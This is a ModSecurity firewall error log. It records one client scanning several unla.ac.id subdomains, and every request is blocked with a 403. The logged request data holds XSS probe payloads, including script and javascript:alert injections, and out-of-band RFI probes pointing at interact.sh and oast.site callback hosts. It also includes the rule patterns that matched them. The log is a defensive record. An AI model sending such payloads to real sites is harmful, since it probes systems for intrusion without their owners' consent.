[Tue Aug 29 11:52:02.847792 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15csCo-f0AAAm7nFQAAAAE"]
[Tue Aug 29 11:52:02.876298 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15csCo-f0AAAnh6PIAAAAS"]
[Tue Aug 29 11:52:03.532108 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15c8Co-f0AAAnkweEAAAAY"]
[Tue Aug 29 11:52:03.542380 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:search_term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:search_term: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15c8Co-f0AAAnd3DgAAAAI"]
[Tue Aug 29 11:52:03.607559 2023] [:error] [pid 2529] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:contactId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:contactId: contactId'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php"] [unique_id "ZO15c8Co-f0AAAnh6PMAAAAS"]
[Tue Aug 29 11:52:03.719160 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:search_title. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:search_title: \\x22><img src=x onerror=alert(domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/jobsearch/"] [unique_id "ZO15c8Co-f0AAAn959UAAAAD"]
[Tue Aug 29 11:52:04.766040 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAm@52YAAAAH"]
[Tue Aug 29 11:52:04.779960 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAni@@AAAAAU"]
[Tue Aug 29 11:52:04.857415 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAfWOKYAAAAL"]
[Tue Aug 29 11:52:04.875694 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAnn2AMAAAAe"]
[Tue Aug 29 11:52:04.886946 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0oef8hkb9tga9w.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0oef8hkb9tga9w.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAoAkt4AAAAC"]
[Tue Aug 29 11:52:04.902493 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dMCo-f0AAAnn2AQAAAAe"]
[Tue Aug 29 11:52:04.904945 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wbm/login/"] [unique_id "ZO15dMCo-f0AAAm@52cAAAAH"]
[Tue Aug 29 11:52:04.905493 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0ywrqbxex7dcwx.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0ywrqbxex7dcwx.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAn0GaIAAAAa"]
[Tue Aug 29 11:52:04.908317 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0d58knum9yz7ep.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0d58knum9yz7ep.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAni@@EAAAAU"]
[Tue Aug 29 11:52:04.927139 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0g9kntqrozy8a3.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0g9kntqrozy8a3.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAnIlnUAAAAV"]
[Tue Aug 29 11:52:04.941563 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0n6c7j4ux43ggc.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0n6c7j4ux43ggc.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dMCo-f0AAAfWOKgAAAAL"]
[Tue Aug 29 11:52:05.526369 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAfWOKkAAAAL"]
[Tue Aug 29 11:52:05.546889 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ed. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');});}); found within ARGS:ed: foooooooooooooo');});});javascript:alert('document.domain');//g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/Dialog/FileDialog.aspx"] [unique_id "ZO15dcCo-f0AAAlUlo4AAAA0"]
[Tue Aug 29 11:52:05.618409 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAfWOKoAAAAL"]
[Tue Aug 29 11:52:05.618549 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAnd3D4AAAAI"]
[Tue Aug 29 11:52:05.622871 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0turiqdtch3ugd.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0turiqdtch3ugd.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-json/oembed/1.0/proxy"] [unique_id "ZO15dcCo-f0AAAm@52oAAAAH"]
[Tue Aug 29 11:52:05.640763 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAnd3D8AAAAI"]
[Tue Aug 29 11:52:05.642088 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dcCo-f0AAAnn2AgAAAAe"]
[Tue Aug 29 11:52:06.552832 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:to: /92874';alert(document.domain)//280"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAn959wAAAAD"]
[Tue Aug 29 11:52:06.553373 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:to: /92874';alert(document.domain)//280"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAnoOo0AAAAf"]
[Tue Aug 29 11:52:06.557473 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:to: /92874';alert(document.domain)//280"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAfWOKwAAAAL"]
[Tue Aug 29 11:52:06.559379 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:to: /92874';alert(document.domain)//280"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAn0GaYAAAAa"]
[Tue Aug 29 11:52:06.571768 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAoAkuQAAAAC"]
[Tue Aug 29 11:52:06.581270 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:secret. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:secret: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15dsCo-f0AAAnd3EEAAAAI"]
[Tue Aug 29 11:52:06.612364 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:to: /92874';alert(document.domain)//280"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/auth/login"] [unique_id "ZO15dsCo-f0AAAm7nFoAAAAE"]
[Tue Aug 29 11:52:06.632361 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:page: javascript:alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/iwc/idcStateError.iwc"] [unique_id "ZO15dsCo-f0AAAlUlpIAAAA0"]
